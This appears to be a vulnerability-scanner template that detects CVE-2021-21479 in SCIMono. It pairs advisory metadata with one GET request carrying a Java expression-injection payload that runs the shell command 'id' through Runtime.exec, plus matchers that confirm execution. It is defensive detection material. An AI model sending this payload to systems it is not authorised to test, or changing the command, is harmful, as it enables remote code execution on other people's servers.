id: CVE-2021-21479 info: name: SCIMono < v0.0.19 Remote Code Execution author: dwisiswant0 severity: critical description: | In SCIMono before 0.0.19, it is possible for an attacker to inject and execute java expression compromising the availability and integrity of the system. reference: - https://securitylab.github.com/advisories/GHSL-2020-227-scimono-ssti/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H cvss-score: 9.1 cve-id: CVE-2021-21479 cwe-id: CWE-74 tags: cve,cve2021,scimono,rce requests: - method: GET path: - "{{BaseURL}}/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(\"id\")')%7D" matchers: - type: word words: - "The attribute value" - "java.lang.UNIXProcess@" - "has invalid value!" - '"status" : "400"' part: body condition: and